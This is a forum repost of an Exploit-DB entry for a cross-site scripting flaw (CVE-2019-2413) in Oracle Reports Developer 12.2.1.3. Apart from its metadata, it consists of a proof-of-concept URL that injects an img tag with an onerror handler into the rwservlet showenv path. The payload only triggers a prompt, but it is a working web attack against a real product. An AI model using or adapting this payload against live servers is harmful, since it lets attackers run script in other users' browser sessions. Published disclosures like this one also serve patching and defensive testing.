Exploit Oracle Reports Developer Component 12.2.1.3 - Cross-site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
46187
Проверка EDB
  1. Пройдено
Автор
MOHAMED M.FOUAD
Тип уязвимости
WEBAPPS
Платформа
MULTIPLE
CVE
cve-2019-2413
Дата публикации
2019-01-17
Oracle Reports Developer Component 12.2.1.3 - Cross-site Scripting
Код:
# Exploit Title: [Cross-site Scripting (XSS)]
# Date: [2019-01-15]
# Exploit Author: [Mohamed M.Fouad - From SecureMisr Company]
# Vendor Homepage: [https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html]
# Version: [12.2.1.3] (REQUIRED)
# Tested on: [Windows 10]
# CVE : [CVE-2019-2413]

POC:

https://<ip>/reports/rwservlet/showenv%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3E
 
Источник
www.exploit-db.com

Похожие темы